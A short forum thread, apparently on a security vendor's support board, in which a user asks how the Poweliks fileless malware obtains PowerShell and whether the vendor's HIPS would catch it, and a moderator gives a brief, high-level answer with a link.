Author Topic: Poweliks - downloading powershell  (Read 502 times)

Offline gambla

  • Newbie
  • *
  • Posts: 14
Poweliks - downloading powershell
« on: January 24, 2021, 08:56:39 AM »
Hey guys,
looking into Fileless Malware, I can't find any details how exactly the malware is downloading powershell if it is not present on the victim's system ? I've already read quite articles about FM but didn't find an answer to my question, hence asking here. They usually just say that the malware is downloading powershell, but not exactly how it's done.
Would CIS HIPS catch this ? Do they use BITS ? Can't find any details.

Thanks guys,
Regards

Offline jay2007tech

  • Malware Research Group
  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 2246
Re: Poweliks - downloading powershell
« Reply #1 on: January 25, 2021, 02:56:26 PM »
Quote
I can't find any details how exactly the malware is downloading powershell if it is not present on the victim's system

https://www.helpnetsecurity.com/2021/01/04/fileless-malware/

I can explain it, but its way too much to write.   2 ways to get infected.  its either the memory or harddrive.  sometimes malicious instructions are hidden in the registry  too

Quote
Would CIS HIPS catch this ?
yes and also itll get sand boxed :)
Quote
Do they use BITS
threes too many different ways besides BITS

 
It's hard being a crooked Admin when the files won't pass an md5checksum test.  But like any other good crooked Admin it can be done, it just takes time(and lots of it) and a few aspirins

Offline gambla

  • Newbie
  • *
  • Posts: 14
Re: Poweliks - downloading powershell
« Reply #2 on: January 26, 2021, 12:56:29 AM »
Thanks Jay !

 

Free Endpoint Protection
Seo4Smf 2.0 © SmfMod.Com Smf Destek